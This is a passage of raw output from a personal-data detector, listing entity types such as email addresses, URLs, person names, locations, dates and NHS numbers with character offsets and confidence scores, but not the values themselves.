26258, end: 26273, score: 1.0, type: EMAIL_ADDRESS, start: 26948, end: 26963, score: 1.0, type: EMAIL_ADDRESS, start: 27304, end: 27319, score: 1.0, type: EMAIL_ADDRESS, start: 27739, end: 27754, score: 1.0, type: EMAIL_ADDRESS, start: 27988, end: 28003, score: 1.0, type: EMAIL_ADDRESS, start: 28166, end: 28181, score: 1.0, type: MEDICAL_LICENSE, start: 28751, end: 28760, score: 1.0, type: EMAIL_ADDRESS, start: 29431, end: 29446, score: 1.0, type: EMAIL_ADDRESS, start: 30926, end: 30941, score: 1.0, type: EMAIL_ADDRESS, start: 30942, end: 30957, score: 1.0, type: EMAIL_ADDRESS, start: 31571, end: 31586, score: 1.0, type: EMAIL_ADDRESS, start: 31587, end: 31602, score: 1.0, type: EMAIL_ADDRESS, start: 33487, end: 33502, score: 1.0, type: EMAIL_ADDRESS, start: 33503, end: 33518, score: 1.0, type: EMAIL_ADDRESS, start: 35382, end: 35397, score: 1.0, type: EMAIL_ADDRESS, start: 35398, end: 35413, score: 1.0, type: DATE_TIME, start: 22785, end: 22795, score: 0.95, type: URL, start: 24581, end: 24616, score: 0.95, type: URL, start: 25275, end: 25289, score: 0.95, type: URL, start: 25624, end: 25659, score: 0.95, type: URL, start: 26315, end: 26329, score: 0.95, type: URL, start: 26636, end: 26671, score: 0.95, type: URL, start: 27361, end: 27375, score: 0.95, type: URL, start: 28660, end: 28728, score: 0.95, type: URL, start: 28816, end: 28874, score: 0.95, type: DATE_TIME, start: 1345, end: 1356, score: 0.85, type: PERSON, start: 1931, end: 1945, score: 0.85, type: LOCATION, start: 2673, end: 2693, score: 0.85, type: PERSON, start: 3470, end: 3480, score: 0.85, type: PERSON, start: 4356, end: 4367, score: 0.85, type: PERSON, start: 5194, end: 5251, score: 0.85, type: PERSON, start: 5774, end: 5831, score: 0.85, type: DATE_TIME, start: 6175, end: 6183, score: 0.85, type: PERSON, start: 8110, end: 8118, score: 0.85, type: DATE_TIME, start: 8192, end: 8200, score: 0.85, type: PERSON, start: 10342, end: 10358, score: 0.85, type: PERSON, start: 13248, end: 13258, score: 0.85, type: PERSON, start: 13392, end: 13410, score: 0.85, type: LOCATION, start: 13641, end: 13663, score: 0.85, type: LOCATION, start: 14441, end: 14460, score: 0.85, type: PERSON, start: 15411, end: 15457, score: 0.85, type: PERSON, start: 16181, end: 16199, score: 0.85, type: PERSON, start: 16386, end: 16397, score: 0.85, type: LOCATION, start: 16558, end: 16580, score: 0.85, type: PERSON, start: 17013, end: 17026, score: 0.85, type: PERSON, start: 19462, end: 19477, score: 0.85, type: LOCATION, start: 20510, end: 20524, score: 0.85, type: LOCATION, start: 22798, end: 22815, score: 0.85, type: LOCATION, start: 23464, end: 23474, score: 0.85, type: DATE_TIME, start: 24710, end: 24735, score: 0.85, type: DATE_TIME, start: 25753, end: 25778, score: 0.85, type: DATE_TIME, start: 26765, end: 26790, score: 0.85, type: DATE_TIME, start: 28397, end: 28425, score: 0.85, type: URL, start: 28743, end: 28773, score: 0.85, type: PERSON, start: 29749, end: 29782, score: 0.85, type: DATE_TIME, start: 31334, end: 31343, score: 0.85, type: PERSON, start: 31349, end: 31376, score: 0.85, type: LOCATION, start: 33809, end: 33824, score: 0.85, type: LOCATION, start: 33826, end: 33834, score: 0.85, type: LOCATION, start: 33950, end: 33970, score: 0.85, type: LOCATION, start: 34535, end: 34555, score: 0.85, type: LOCATION, start: 34707, end: 34727, score: 0.85, type: LOCATION, start: 35075, end: 35083, score: 0.85, type: DATE_TIME, start: 35694, end: 35703, score: 0.85, type: DATE_TIME, start: 36375, end: 36384, score: 0.85, type: PERSON, start: 37269, end: 37283, score: 0.85, type: NRP, start: 37875, end: 37887, score: 0.85, type: PERSON, start: 40062, end: 40087, score: 0.85, type: LOCATION, start: 40239, end: 40262, score: 0.85, type: URL, start: 14368, end: 14389, score: 0.6, type: URL, start: 14898, end: 14919, score: 0.6, type: IP_ADDRESS, start: 25136, end: 25145, score: 0.6, type: URL, start: 25370, end: 25467, score: 0.6, type: IP_ADDRESS, start: 26179, end: 26188, score: 0.6, type: URL, start: 26382, end: 26479, score: 0.6, type: IP_ADDRESS, start: 27225, end: 27234, score: 0.6, type: URL, start: 223, end: 233, score: 0.5, type: URL, start: 282, end: 292, score: 0.5, type: URL, start: 345, end: 355, score: 0.5, type: URL, start: 400, end: 410, score: 0.5, type: URL, start: 444, end: 454, score: 0.5, type: URL, start: 506, end: 517, score: 0.5, type: URL, start: 613, end: 623, score: 0.5, type: URL, start: 664, end: 674, score: 0.5, type: URL, start: 735, end: 745, score: 0.5, type: URL, start: 812, end: 822, score: 0.5, type: URL, start: 881, end: 891, score: 0.5, type: URL, start: 952, end: 962, score: 0.5, type: URL, start: 1086, end: 1096, score: 0.5, type: URL, start: 1238, end: 1248, score: 0.5, type: URL, start: 1284, end: 1290, score: 0.5, type: URL, start: 2290, end: 2299, score: 0.5, type: URL, start: 2574, end: 2587, score: 0.5, type: URL, start: 2845, end: 2855, score: 0.5, type: URL, start: 2865, end: 2872, score: 0.5, type: URL, start: 2939, end: 2945, score: 0.5, type: URL, start: 3712, end: 3728, score: 0.5, type: URL, start: 4132, end: 4141, score: 0.5, type: URL, start: 4680, end: 4690, score: 0.5, type: URL, start: 4796, end: 4806, score: 0.5, type: URL, start: 4828, end: 4838, score: 0.5, type: URL, start: 4874, end: 4884, score: 0.5, type: URL, start: 4954, end: 4964, score: 0.5, type: URL, start: 5207, end: 5232, score: 0.5, type: URL, start: 5251, end: 5261, score: 0.5, type: URL, start: 5341, end: 5351, score: 0.5, type: URL, start: 5582, end: 5592, score: 0.5, type: URL, start: 5787, end: 5812, score: 0.5, type: URL, start: 5831, end: 5841, score: 0.5, type: URL, start: 5896, end: 5906, score: 0.5, type: URL, start: 5968, end: 5977, score: 0.5, type: URL, start: 6702, end: 6712, score: 0.5, type: URL, start: 7185, end: 7196, score: 0.5, type: URL, start: 8212, end: 8221, score: 0.5, type: URL, start: 8554, end: 8569, score: 0.5, type: URL, start: 8574, end: 8583, score: 0.5, type: URL, start: 8592, end: 8603, score: 0.5, type: URL, start: 8610, end: 8619, score: 0.5, type: URL, start: 8708, end: 8719, score: 0.5, type: URL, start: 8928, end: 8934, score: 0.5, type: URL, start: 8978, end: 8997, score: 0.5, type: URL, start: 9018, end: 9029, score: 0.5, type: URL, start: 9059, end: 9070, score: 0.5, type: URL, start: 9100, end: 9111, score: 0.5, type: URL, start: 9443, end: 9449, score: 0.5, type: URL, start: 9475, end: 9481, score: 0.5, type: URL, start: 11056, end: 11062, score: 0.5, type: URL, start: 11106, end: 11125, score: 0.5, type: URL, start: 11146, end: 11157, score: 0.5, type: URL, start: 11187, end: 11198, score: 0.5, type: URL, start: 11228, end: 11239, score: 0.5, type: URL, start: 11527, end: 11533, score: 0.5, type: URL, start: 11559, end: 11565, score: 0.5, type: URL, start: 12002, end: 12015, score: 0.5, type: URL, start: 12043, end: 12057, score: 0.5, type: URL, start: 12471, end: 12482, score: 0.5, type: URL, start: 12511, end: 12522, score: 0.5, type: URL, start: 12552, end: 12563, score: 0.5, type: URL, start: 12593, end: 12604, score: 0.5, type: URL, start: 12788, end: 12799, score: 0.5, type: URL, start: 13324, end: 13350, score: 0.5, type: URL, start: 13641, end: 13651, score: 0.5, type: URL, start: 13868, end: 13878, score: 0.5, type: URL, start: 14015, end: 14025, score: 0.5, type: URL, start: 14492, end: 14502, score: 0.5, type: URL, start: 14686, end: 14696, score: 0.5, type: URL, start: 15064, end: 15074, score: 0.5, type: URL, start: 15264, end: 15274, score: 0.5, type: URL, start: 15545, end: 15550, score: 0.5, type: URL, start: 16025, end: 16038, score: 0.5, type: URL, start: 16050, end: 16064, score: 0.5, type: URL, start: 16491, end: 16504, score: 0.5, type: URL, start: 16516, end: 16530, score: 0.5, type: URL, start: 16809, end: 16819, score: 0.5, type: URL, start: 16910, end: 16923, score: 0.5, type: URL, start: 16938, end: 16952, score: 0.5, type: URL, start: 17234, end: 17247, score: 0.5, type: URL, start: 17269, end: 17283, score: 0.5, type: URL, start: 17634, end: 17647, score: 0.5, type: URL, start: 17663, end: 17677, score: 0.5, type: URL, start: 17892, end: 17902, score: 0.5, type: URL, start: 18111, end: 18124, score: 0.5, type: URL, start: 18150, end: 18164, score: 0.5, type: URL, start: 18527, end: 18540, score: 0.5, type: URL, start: 18562, end: 18576, score: 0.5, type: URL, start: 18891, end: 18904, score: 0.5, type: URL, start: 18926, end: 18940, score: 0.5, type: URL, start: 19093, end: 19106, score: 0.5, type: URL, start: 19120, end: 19134, score: 0.5, type: URL, start: 19963, end: 19978, score: 0.5, type: URL, start: 20067, end: 20076, score: 0.5, type: URL, start: 20402, end: 20423, score: 0.5, type: URL, start: 20739, end: 20752, score: 0.5, type: URL, start: 20779, end: 20793, score: 0.5, type: URL, start: 21296, end: 21307, score: 0.5, type: URL, start: 21352, end: 21363, score: 0.5, type: URL, start: 21773, end: 21786, score: 0.5, type: URL, start: 21798, end: 21812, score: 0.5, type: URL, start: 22119, end: 22130, score: 0.5, type: URL, start: 22428, end: 22439, score: 0.5, type: URL, start: 22460, end: 22470, score: 0.5, type: URL, start: 22487, end: 22493, score: 0.5, type: URL, start: 22688, end: 22701, score: 0.5, type: URL, start: 22713, end: 22727, score: 0.5, type: URL, start: 23030, end: 23036, score: 0.5, type: URL, start: 23200, end: 23219, score: 0.5, type: URL, start: 23229, end: 23239, score: 0.5, type: URL, start: 23318, end: 23337, score: 0.5, type: URL, start: 23347, end: 23357, score: 0.5, type: URL, start: 23423, end: 23442, score: 0.5, type: URL, start: 23452, end: 23462, score: 0.5, type: URL, start: 23482, end: 23491, score: 0.5, type: URL, start: 23499, end: 23512, score: 0.5, type: URL, start: 23535, end: 23549, score: 0.5, type: URL, start: 23958, end: 23973, score: 0.5, type: URL, start: 24012, end: 24022, score: 0.5, type: URL, start: 24262, end: 24273, score: 0.5, type: URL, start: 24309, end: 24322, score: 0.5, type: URL, start: 24339, end: 24353, score: 0.5, type: URL, start: 24865, end: 24874, score: 0.5, type: URL, start: 25026, end: 25065, score: 0.5, type: URL, start: 25094, end: 25122, score: 0.5, type: URL, start: 25224, end: 25233, score: 0.5, type: URL, start: 25908, end: 25917, score: 0.5, type: URL, start: 26069, end: 26108, score: 0.5, type: URL, start: 26137, end: 26165, score: 0.5, type: URL, start: 26264, end: 26273, score: 0.5, type: URL, start: 26954, end: 26963, score: 0.5, type: URL, start: 27115, end: 27154, score: 0.5, type: URL, start: 27183, end: 27211, score: 0.5, type: URL, start: 27310, end: 27319, score: 0.5, type: URL, start: 27745, end: 27754, score: 0.5, type: URL, start: 27994, end: 28003, score: 0.5, type: URL, start: 28172, end: 28181, score: 0.5, type: URL, start: 28316, end: 28355, score: 0.5, type: URL, start: 29090, end: 29100, score: 0.5, type: URL, start: 29437, end: 29446, score: 0.5, type: URL, start: 29465, end: 29475, score: 0.5, type: URL, start: 29979, end: 29992, score: 0.5, type: URL, start: 30002, end: 30016, score: 0.5, type: URL, start: 30276, end: 30289, score: 0.5, type: URL, start: 30317, end: 30331, score: 0.5, type: URL, start: 30427, end: 30434, score: 0.5, type: URL, start: 30932, end: 30941, score: 0.5, type: URL, start: 30948, end: 30957, score: 0.5, type: URL, start: 31274, end: 31283, score: 0.5, type: URL, start: 31429, end: 31438, score: 0.5, type: URL, start: 31577, end: 31586, score: 0.5, type: URL, start: 31593, end: 31602, score: 0.5, type: URL, start: 31769, end: 31773, score: 0.5, type: URL, start: 32841, end: 32850, score: 0.5, type: URL, start: 32946, end: 32950, score: 0.5, type: URL, start: 33344, end: 33354, score: 0.5, type: URL, start: 33493, end: 33502, score: 0.5, type: URL, start: 33509, end: 33518, score: 0.5, type: URL, start: 33681, end: 33691, score: 0.5, type: URL, start: 35388, end: 35397, score: 0.5, type: URL, start: 35404, end: 35413, score: 0.5, type: URL, start: 35637, end: 35643, score: 0.5, type: URL, start: 36312, end: 36324, score: 0.5, type: URL, start: 37304, end: 37314, score: 0.5, type: URL, start: 37476, end: 37489, score: 0.5, type: URL, start: 37512, end: 37526, score: 0.5, type: URL, start: 37929, end: 37939, score: 0.5, type: URL, start: 38093, end: 38103, score: 0.5, type: URL, start: 38189, end: 38202, score: 0.5, type: URL, start: 38222, end: 38236, score: 0.5, type: URL, start: 38600, end: 38611, score: 0.5, type: URL, start: 38639, end: 38650, score: 0.5, type: URL, start: 38678, end: 38689, score: 0.5, type: URL, start: 39142, end: 39152, score: 0.5, type: URL, start: 39386, end: 39391, score: 0.5, type: URL, start: 39411, end: 39421, score: 0.5, type: URL, start: 39554, end: 39567, score: 0.5, type: URL, start: 39592, end: 39606, score: 0.5, type: URL, start: 39946, end: 39956, score: 0.5, type: URL, start: 40249, end: 40259, score: 0.5, type: URL, start: 40314, end: 40346, score: 0.5, type: URL, start: 40512, end: 40525, score: 0.5, type: URL, start: 40536, end: 40550, score: 0.5, type: URL, start: 40912, end: 40925, score: 0.5, type: URL, start: 40949, end: 40963, score: 0.5, type: URL, start: 41199, end: 41212, score: 0.5, type: URL, start: 41247, end: 41261, score: 0.5, type: URL, start: 41622, end: 41635, score: 0.5, type: URL, start: 41662, end: 41676, score: 0.5, type: EMAIL_ADDRESS, start: 4323, end: 4338, score: 1.0, type: URL, start: 3121, end: 3157, score: 0.95, type: PERSON, start: 898, end: 916, score: 0.85, type: URL, start: 1739, end: 1747, score: 0.85, type: URL, start: 1857, end: 1865, score: 0.85, type: PERSON, start: 2099, end: 2100, score: 0.85, type: DATE_TIME, start: 2150, end: 2162, score: 0.85, type: URL, start: 3446, end: 3450, score: 0.85, type: PERSON, start: 3529, end: 3556, score: 0.85, type: NRP, start: 4070, end: 4076, score: 0.85, type: DATE_TIME, start: 4135, end: 4146, score: 0.85, type: DATE_TIME, start: 4147, end: 4159, score: 0.85, type: PERSON, start: 4297, end: 4302, score: 0.85, type: DATE_TIME, start: 2138, end: 2149, score: 0.6, type: URL, start: 409, end: 415, score: 0.5, type: URL, start: 430, end: 436, score: 0.5, type: URL, start: 485, end: 494, score: 0.5, type: URL, start: 784, end: 791, score: 0.5, type: URL, start: 1056, end: 1071, score: 0.5, type: URL, start: 1094, end: 1109, score: 0.5, type: URL, start: 1330, end: 1335, score: 0.5, type: URL, start: 1632, end: 1640, score: 0.5, type: URL, start: 1969, end: 1977, score: 0.5, type: URL, start: 2183, end: 2207, score: 0.5, type: URL, start: 2267, end: 2275, score: 0.5, type: URL, start: 2353, end: 2361, score: 0.5, type: URL, start: 2430, end: 2445, score: 0.5, type: URL, start: 2548, end: 2552, score: 0.5, type: URL, start: 2649, end: 2659, score: 0.5, type: URL, start: 2662, end: 2667, score: 0.5, type: URL, start: 2732, end: 2739, score: 0.5, type: URL, start: 2756, end: 2767, score: 0.5, type: URL, start: 3085, end: 3100, score: 0.5, type: URL, start: 3572, end: 3577, score: 0.5, type: URL, start: 3652, end: 3656, score: 0.5, type: URL, start: 3724, end: 3731, score: 0.5, type: URL, start: 3925, end: 3932, score: 0.5, type: URL, start: 4017, end: 4024, score: 0.5, type: URL, start: 4083, end: 4090, score: 0.5, type: URL, start: 4172, end: 4179, score: 0.5, type: URL, start: 4186, end: 4210, score: 0.5, type: URL, start: 4267, end: 4274, score: 0.5, type: URL, start: 4329, end: 4338, score: 0.5, type: URL, start: 4402, end: 4410, score: 0.5, type: URL, start: 4496, end: 4504, score: 0.5, type: EMAIL_ADDRESS, start: 10160, end: 10175, score: 1.0, type: EMAIL_ADDRESS, start: 12548, end: 12563, score: 1.0, type: URL, start: 1702, end: 1728, score: 0.95, type: URL, start: 6352, end: 6444, score: 0.95, type: DATE_TIME, start: 122, end: 128, score: 0.85, type: URL, start: 244, end: 253, score: 0.85, type: NRP, start: 427, end: 438, score: 0.85, type: PERSON, start: 487, end: 505, score: 0.85, type: PERSON, start: 506, end: 517, score: 0.85, type: LOCATION, start: 1226, end: 1240, score: 0.85, type: PERSON, start: 2089, end: 2106, score: 0.85, type: LOCATION, start: 2472, end: 2486, score: 0.85, type: LOCATION, start: 2797, end: 2811, score: 0.85, type: URL, start: 3031, end: 3038, score: 0.85, type: PERSON, start: 3307, end: 3325, score: 0.85, type: URL, start: 4523, end: 4530, score: 0.85, type: URL, start: 4871, end: 4878, score: 0.85, type: URL, start: 4915, end: 4930, score: 0.85, type: URL, start: 4970, end: 4979, score: 0.85, type: URL, start: 5137, end: 5146, score: 0.85, type: PERSON, start: 5222, end: 5277, score: 0.85, type: LOCATION, start: 5573, end: 5586, score: 0.85, type: PERSON, start: 6011, end: 6026, score: 0.85, type: LOCATION, start: 6141, end: 6157, score: 0.85, type: URL, start: 6576, end: 6583, score: 0.85, type: URL, start: 6692, end: 6699, score: 0.85, type: URL, start: 7041, end: 7050, score: 0.85, type: PERSON, start: 7126, end: 7181, score: 0.85, type: URL, start: 7861, end: 7868, score: 0.85, type: URL, start: 7899, end: 7914, score: 0.85, type: URL, start: 8130, end: 8139, score: 0.85, type: PERSON, start: 8215, end: 8270, score: 0.85, type: URL, start: 8698, end: 8705, score: 0.85, type: URL, start: 8852, end: 8867, score: 0.85, type: URL, start: 9087, end: 9096, score: 0.85, type: PERSON, start: 9172, end: 9227, score: 0.85, type: PERSON, start: 9566, end: 9571, score: 0.85, type: NRP, start: 10067, end: 10071, score: 0.85, type: URL, start: 10204, end: 10211, score: 0.85, type: URL, start: 10355, end: 10370, score: 0.85, type: PERSON, start: 10476, end: 10500, score: 0.85, type: NRP, start: 10570, end: 10585, score: 0.85, type: URL, start: 11377, end: 11384, score: 0.85, type: URL, start: 11643, end: 11650, score: 0.85, type: URL, start: 11702, end: 11708, score: 0.85, type: URL, start: 11770, end: 11785, score: 0.85, type: PERSON, start: 11876, end: 11900, score: 0.85, type: NRP, start: 12455, end: 12459, score: 0.85, type: NRP, start: 12858, end: 12873, score: 0.85, type: PERSON, start: 14999, end: 15023, score: 0.85, type: LOCATION, start: 15162, end: 15172, score: 0.85, type: URL, start: 15873, end: 15880, score: 0.85, type: URL, start: 16352, end: 16359, score: 0.85, type: URL, start: 16651, end: 16658, score: 0.85, type: URL, start: 17000, end: 17007, score: 0.85, type: URL, start: 17415, end: 17422, score: 0.85, type: LOCATION, start: 17532, end: 17547, score: 0.85, type: PERSON, start: 17756, end: 17771, score: 0.85, type: URL, start: 17940, end: 17947, score: 0.85, type: LOCATION, start: 18008, end: 18023, score: 0.85, type: LOCATION, start: 18024, end: 18039, score: 0.85, type: URL, start: 18569, end: 18576, score: 0.85, type: URL, start: 19515, end: 19522, score: 0.85, type: URL, start: 20384, end: 20391, score: 0.85, type: URL, start: 21116, end: 21123, score: 0.85, type: URL, start: 21531, end: 21538, score: 0.85, type: URL, start: 22128, end: 22135, score: 0.85, type: PERSON, start: 22842, end: 22866, score: 0.85, type: LOCATION, start: 23563, end: 23577, score: 0.85, type: LOCATION, start: 23848, end: 23862, score: 0.85, type: LOCATION, start: 24508, end: 24522, score: 0.85, type: LOCATION, start: 24523, end: 24537, score: 0.85, type: PERSON, start: 24671, end: 24695, score: 0.85, type: LOCATION, start: 25085, end: 25111, score: 0.85, type: URL, start: 25220, end: 25229, score: 0.85, type: URL, start: 4139, end: 4166, score: 0.6, type: URL, start: 4212, end: 4240, score: 0.6, type: URL, start: 5945, end: 5998, score: 0.6, type: URL, start: 1331, end: 1350, score: 0.5, type: URL, start: 1405, end: 1425, score: 0.5, type: URL, start: 1613, end: 1631, score: 0.5, type: URL, start: 2249, end: 2256, score: 0.5, type: URL, start: 2280, end: 2288, score: 0.5, type: URL, start: 2502, end: 2509, score: 0.5, type: URL, start: 2610, end: 2617, score: 0.5, type: URL, start: 2837, end: 2844, score: 0.5, type: URL, start: 2919, end: 2927, score: 0.5, type: URL, start: 3069, end: 3076, score: 0.5, type: URL, start: 3516, end: 3523, score: 0.5, type: URL, start: 3624, end: 3631, score: 0.5, type: URL, start: 3851, end: 3858, score: 0.5, type: URL, start: 3933, end: 3941, score: 0.5, type: URL, start: 4095, end: 4102, score: 0.5, type: URL, start: 4121, end: 4128, score: 0.5, type: URL, start: 4194, end: 4201, score: 0.5, type: URL, start: 4251, end: 4258, score: 0.5, type: URL, start: 4277, end: 4288, score: 0.5, type: URL, start: 4304, end: 4320, score: 0.5, type: URL, start: 4327, end: 4335, score: 0.5, type: URL, start: 4454, end: 4461, score: 0.5, type: URL, start: 5198, end: 5207, score: 0.5, type: URL, start: 5651, end: 5667, score: 0.5, type: URL, start: 6011, end: 6018, score: 0.5, type: URL, start: 6124, end: 6131, score: 0.5, type: URL, start: 6176, end: 6184, score: 0.5, type: URL, start: 6848, end: 6857, score: 0.5, type: URL, start: 6878, end: 6887, score: 0.5, type: URL, start: 7102, end: 7111, score: 0.5, type: URL, start: 7494, end: 7501, score: 0.5, type: URL, start: 7969, end: 7978, score: 0.5, type: URL, start: 8191, end: 8200, score: 0.5, type: URL, start: 8922, end: 8931, score: 0.5, type: URL, start: 9148, end: 9157, score: 0.5, type: URL, start: 9812, end: 9819, score: 0.5, type: URL, start: 10166, end: 10175, score: 0.5, type: URL, start: 10436, end: 10445, score: 0.5, type: URL, start: 11836, end: 11845, score: 0.5, type: URL, start: 12554, end: 12563, score: 0.5, type: URL, start: 14294, end: 14305, score: 0.5, type: URL, start: 14479, end: 14488, score: 0.5, type: URL, start: 14827, end: 14838, score: 0.5, type: URL, start: 14881, end: 14896, score: 0.5, type: URL, start: 14959, end: 14968, score: 0.5, type: URL, start: 15722, end: 15729, score: 0.5, type: URL, start: 15759, end: 15766, score: 0.5, type: URL, start: 15791, end: 15798, score: 0.5, type: URL, start: 15806, end: 15817, score: 0.5, type: URL, start: 15833, end: 15849, score: 0.5, type: URL, start: 18993, end: 19004, score: 0.5, type: URL, start: 19938, end: 19949, score: 0.5, type: URL, start: 20802, end: 20813, score: 0.5, type: URL, start: 22506, end: 22517, score: 0.5, type: URL, start: 22652, end: 22659, score: 0.5, type: URL, start: 22729, end: 22744, score: 0.5, type: URL, start: 22802, end: 22811, score: 0.5, type: URL, start: 22868, end: 22875, score: 0.5, type: URL, start: 23115, end: 23126, score: 0.5, type: URL, start: 23199, end: 23210, score: 0.5, type: URL, start: 23953, end: 23972, score: 0.5, type: URL, start: 24027, end: 24047, score: 0.5, type: URL, start: 25137, end: 25143, score: 0.5, type: URL, start: 25145, end: 25154, score: 0.5, type: URL, start: 26682, end: 26697, score: 0.5, type: URL, start: 26707, end: 26714, score: 0.5, type: URL, start: 26770, end: 26777, score: 0.5, type: URL, start: 26991, end: 27006, score: 0.5, type: URL, start: 27018, end: 27025, score: 0.5, type: URL, start: 27039, end: 27046, score: 0.5, type: URL, start: 599, end: 653, score: 0.95, type: PERSON, start: 4, end: 11, score: 0.85, type: PERSON, start: 834, end: 845, score: 0.85, type: PERSON, start: 1179, end: 1188, score: 0.85, type: PERSON, start: 1259, end: 1268, score: 0.85, type: PERSON, start: 1282, end: 1291, score: 0.85, type: LOCATION, start: 1422, end: 1438, score: 0.85, type: PERSON, start: 1603, end: 1608, score: 0.85, type: IP_ADDRESS, start: 316, end: 325, score: 0.6, type: URL, start: 26, end: 32, score: 0.5, type: URL, start: 115, end: 121, score: 0.5, type: URL, start: 196, end: 202, score: 0.5, type: URL, start: 811, end: 819, score: 0.5, type: URL, start: 1073, end: 1081, score: 0.5, type: URL, start: 1132, end: 1140, score: 0.5, type: URL, start: 1422, end: 1441, score: 0.5, type: URL, start: 1633, end: 1639, score: 0.5, type: URL, start: 1758, end: 1764, score: 0.5, type: URL, start: 1957, end: 1964, score: 0.5, type: URL, start: 2069, end: 2076, score: 0.5, type: URL, start: 2173, end: 2185, score: 0.5, type: UK_NHS, start: 4022, end: 4032, score: 1.0, type: UK_NHS, start: 15366, end: 15376, score: 1.0, type: UK_NHS, start: 24128, end: 24138, score: 1.0, type: UK_NHS, start: 32882, end: 32892, score: 1.0, type: PERSON, start: 418, end: 422, score: 0.85, type: DATE_TIME, start: 1735, end: 1746, score: 0.85, type: DATE_TIME, start: 2216, end: 2227, score: 0.85, type: DATE_TIME, start: 2791, end: 2802, score: 0.85, type: DATE_TIME, start: 3470, end: 3481, score: 0.85, type: PERSON, start: 4433, end: 4469, score: 0.85, type: DATE_TIME, start: 5930, end: 5937, score: 0.85, type: PERSON, start: 6297, end: 6325, score: 0.85, type: DATE_TIME, start: 6872, end: 6883, score: 0.85, type: PERSON, start: 11671, end: 11689, score: 0.85, type: DATE_TIME, start: 12534, end: 12545, score: 0.85, type: DATE_TIME, start: 13390, end: 13401, score: 0.85, type: DATE_TIME, start: 14128, end: 14139, score: 0.85, type: DATE_TIME, start: 14809, end: 14820, score: 0.85, type: PERSON, start: 15777, end: 15813, score: 0.85, type: DATE_TIME, start: 17274, end: 17281, score: 0.85, type: PERSON, start: 17641, end: 17669, score: 0.85, type: DATE_TIME, start: 18216, end: 18227, score: 0.85, type: DATE_TIME, start: 22882, end: 22893, score: 0.85, type: DATE_TIME, start: 23571, end: 23582, score: 0.85, type: PERSON, start: 24539, end: 24575, score: 0.85, type: DATE_TIME, start: 26036, end: 26043, score: 0.85, type: PERSON, start: 26403, end: 26431, score: 0.85, type: DATE_TIME, start: 26978, end: 26989, score: 0.85, type: DATE_TIME, start: 31644, end: 31655, score: 0.85, type: DATE_TIME, start: 32325, end: 32336, score: 0.85, type: PERSON, start: 33293, end: 33329, score: 0.85, type: DATE_TIME, start: 34790, end: 34797, score: 0.85, type: PERSON, start: 35157, end: 35185, score: 0.85, type: DATE_TIME, start: 35732, end: 35743, score: 0.85, type: PERSON, start: 40713, end: 40731, score: 0.85, type: IP_ADDRESS, start: 35325, end: 35326, score: 0.6, type: IP_ADDRESS, start: 35475, end: 35479, score: 0.6, type: URL, start: 510, end: 516, score: 0.5, type: URL, start: 866, end: 879, score: 0.5, type: URL, start: 1263, end: 1276, score: 0.5, type: URL, start: 1585, end: 1598, score: 0.5, type: URL, start: 1606, end: 1611, score: 0.5, type: URL, start: 1639, end: 1654, score: 0.5, type: URL, start: 1780, end: 1787, score: 0.5, type: URL, start: 1793, end: 1803, score: 0.5, type: URL, start: 1817, end: 1830, score: 0.5, type: URL, start: 2042, end: 2055, score: 0.5, type: URL, start: 2063, end: 2068, score: 0.5, type: URL, start: 2096, end: 2117, score: 0.5, type: URL, start: 2269, end: 2276, score: 0.5, type: URL, start: 2300, end: 2307, score: 0.5, type: URL, start: 2311, end: 2327, score: 0.5, type: URL, start: 2343, end: 2354, score: 0.5, type: URL, start: 2588, end: 2601, score: 0.5, type: URL, start: 2609, end: 2614, score: 0.5, type: URL, start: 2642, end: 2667, score: 0.5, type: URL, start: 2852, end: 2859, score: 0.5, type: URL, start: 2887, end: 2894, score: 0.5, type: URL, start: 2903, end: 2923, score: 0.5, type: URL, start: 2948, end: 2964, score: 0.5, type: URL, start: 3239, end: 3252, score: 0.5, type: URL, start: 3260, end: 3265, score: 0.5, type: URL, start: 3293, end: 3327, score: 0.5, type: URL, start: 3539, end: 3546, score: 0.5, type: URL, start: 3578, end: 3585, score: 0.5, type: URL, start: 3621, end: 3636, score: 0.5, type: URL, start: 3668, end: 3683, score: 0.5, type: URL, start: 4471, end: 4484, score: 0.5, type: URL, start: 4492, end: 4497, score: 0.5, type: URL, start: 6327, end: 6340, score: 0.5, type: URL, start: 6348, end: 6353, score: 0.5, type: URL, start: 6949, end: 6956, score: 0.5, type: URL, start: 6992, end: 6999, score: 0.5, type: URL, start: 7039, end: 7046, score: 0.5, type: URL, start: 7099, end: 7106, score: 0.5, type: URL, start: 7154, end: 7161, score: 0.5, type: URL, start: 7205, end: 7212, score: 0.5, type: URL, start: 7253, end: 7260, score: 0.5, type: URL, start: 7356, end: 7363, score: 0.5, type: URL, start: 7410, end: 7417, score: 0.5, type: URL, start: 7457, end: 7464, score: 0.5, type: URL, start: 7499, end: 7506, score: 0.5, type: URL, start: 7667, end: 7674, score: 0.5, type: URL, start: 7879, end: 7886, score: 0.5, type: URL, start: 8154, end: 8161, score: 0.5, type: URL, start: 8251, end: 8258, score: 0.5, type: URL, start: 8361, end: 8368, score: 0.5, type: URL, start: 8466, end: 8473, score: 0.5, type: URL, start: 8567, end: 8574, score: 0.5, type: URL, start: 8665, end: 8672, score: 0.5, type: URL, start: 8868, end: 8875, score: 0.5, type: URL, start: 8972, end: 8979, score: 0.5, type: URL, start: 9069, end: 9076, score: 0.5, type: URL, start: 9161, end: 9168, score: 0.5, type: URL, start: 9463, end: 9476, score: 0.5, type: URL, start: 9593, end: 9622, score: 0.5, type: URL, start: 9979, end: 9986, score: 0.5, type: URL, start: 10046, end: 10053, score: 0.5, type: URL, start: 10282, end: 10295, score: 0.5, type: URL, start: 10408, end: 10428, score: 0.5, type: URL, start: 10754, end: 10761, score: 0.5, type: URL, start: 10784, end: 10791, score: 0.5, type: URL, start: 10951, end: 10964, score: 0.5, type: URL, start: 11073, end: 11089, score: 0.5, type: URL, start: 11378, end: 11385, score: 0.5, type: URL, start: 11403, end: 11410, score: 0.5, type: URL, start: 11545, end: 11558, score: 0.5, type: URL, start: 11663, end: 11673, score: 0.5, type: URL, start: 11969, end: 11976, score: 0.5, type: URL, start: 11996, end: 12003, score: 0.5, type: URL, start: 12120, end: 12133, score: 0.5, type: URL, start: 12386, end: 12399, score: 0.5, type: URL, start: 12407, end: 12412, score: 0.5, type: URL, start: 12440, end: 12453, score: 0.5, type: URL, start: 12579, end: 12586, score: 0.5, type: URL, start: 12592, end: 12600, score: 0.5, type: URL, start: 12614, end: 12627, score: 0.5, type: URL, start: 12826, end: 12839, score: 0.5, type: URL, start: 12847, end: 12852, score: 0.5, type: URL, start: 12880, end: 12899, score: 0.5, type: URL, start: 13024, end: 13037, score: 0.5, type: URL, start: 13045, end: 13050, score: 0.5, type: 